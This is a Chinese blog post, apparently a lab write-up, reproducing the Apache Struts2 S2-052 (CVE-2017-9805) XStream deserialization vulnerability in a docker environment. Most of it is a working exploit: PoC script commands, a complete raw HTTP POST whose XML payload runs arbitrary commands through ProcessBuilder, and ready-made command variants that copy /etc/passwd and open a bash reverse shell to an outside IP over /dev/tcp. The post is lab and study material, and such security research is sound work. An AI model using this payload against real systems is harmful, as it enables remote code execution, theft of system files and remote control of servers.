• S2-052 漏洞复现


    Structs2框架已知的漏洞编号如下:
    • S2-005
    • S2-009
    • S2-016 (含S2-013)
    • S2-019
    • S2-020
    • S2-021
    • S2-032
    • S2-037(含S2-033)
    • DevMode
    • S2-045
    • S2-046
    • S2-048
    • S2-052
    • S2-055
    • S2-057
     
    S2-052(CVE-2017-9805)环境:
     
    访问 http://你的 IP 地址:端口号/
    漏洞poc检测与利用
    poc下载:
    检测到漏洞存在:
    python apache-struts-pwn.py -u 'http://192.168.190.135:8080/orders/3/edit'
    漏洞利用写入文件
    python apache-struts-pwn.py --exploit --url 'http://example.com/struts2-showcase/index.action' -c 'echo test > /tmp/apache-struts-pwn'
     
    POST /orders/3 HTTP/1.1
    Host: 192.168.190.135:8080
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/xml
    Content-Length: 2415
    Connection: close
    Referer: http://192.168.190.135:8080/orders/3/edit
    Cookie: JSESSIONID=8FCB55C3A30CB6059D3530A01C3E6FA0
    Upgrade-Insecure-Requests: 1
    DNT: 1
     
    <map>
    <entry>
    <jdk.nashorn.internal.objects.NativeString>
    <flags>0</flags>
    <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
    <dataHandler>
    <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
    <is class="javax.crypto.CipherInputStream">
    <cipher class="javax.crypto.NullCipher">
    <initialized>false</initialized>
    <opmode>0</opmode>
    <serviceIterator class="javax.imageio.spi.FilterIterator">
    <iter class="javax.imageio.spi.FilterIterator">
    <iter class="java.util.Collections$EmptyIterator"/>
    <next class="java.lang.ProcessBuilder">
    <command>
    <string>touch</string>
    <string>/tmp/success</string>
    </command>
    <redirectErrorStream>false</redirectErrorStream>
    </next>
    </iter>
    <filter class="javax.imageio.ImageIO$ContainsFilter">
    <method>
    <class>java.lang.ProcessBuilder</class>
    <name>start</name>
    <parameter-types/>
    </method>
    <name>foo</name>
    </filter>
    <next class="string">foo</next>
    </serviceIterator>
    <lock/>
    </cipher>
    <input class="java.lang.ProcessBuilder$NullInputStream"/>
    <ibuffer></ibuffer>
    <done>false</done>
    <ostart>0</ostart>
    <ofinish>0</ofinish>
    <closed>false</closed>
    </is>
    <consumed>false</consumed>
    </dataSource>
    <transferFlavors/>
    </dataHandler>
    <dataLen>0</dataLen>
    </value>
    </jdk.nashorn.internal.objects.NativeString>
    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
    </entry>
    <entry>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
    </entry>
    </map>
     
     
     
     
    以上数据包成功执行的话,会在docker容器内创建文件/tmp/success,
    执行docker-compose exec struts2 ls /tmp/即可看到。
    docker-compose exec struts2 ls /tmp/
    读文件:
    <command> <string>cp</string> <string>/etc/passwd</string> <string>/tmp/passwd</string> </command>
     
    写文件:
    <command>
    <string>bash</string>
    <string>-c</string>
    <string>echo micr067 > /tmp/test.txt</string>
    </command>
    反弹shell:
    <command> <string>bash</string> <string>-c</string> <string>bash -i >&; /dev/tcp/192.168.190.130/1521 0>&;1</string> </command>
     
    参考链接:
     
     
  • 相关阅读:
    linux—上传,下载本地文件到服务器
    elasticsearch摸石头过河——数据导入(五)
    elasticsearch摸石头过河——配置文件解析(四)
    elasticsearch摸石头过河——基本安装应用(三)
    elasticsearch摸石头过河——常用数据类型(二)
    spring AOP——名词,语法介绍(一)
    EXCEL(POI)导入导出工具类
    MAVEN 排除第三方jar
    elasticsearch摸石头过河——基本概念(一)
    websocket应用
  • 原文地址:https://www.cnblogs.com/micr067/p/11626531.html
Copyright © 2020-2023  润新知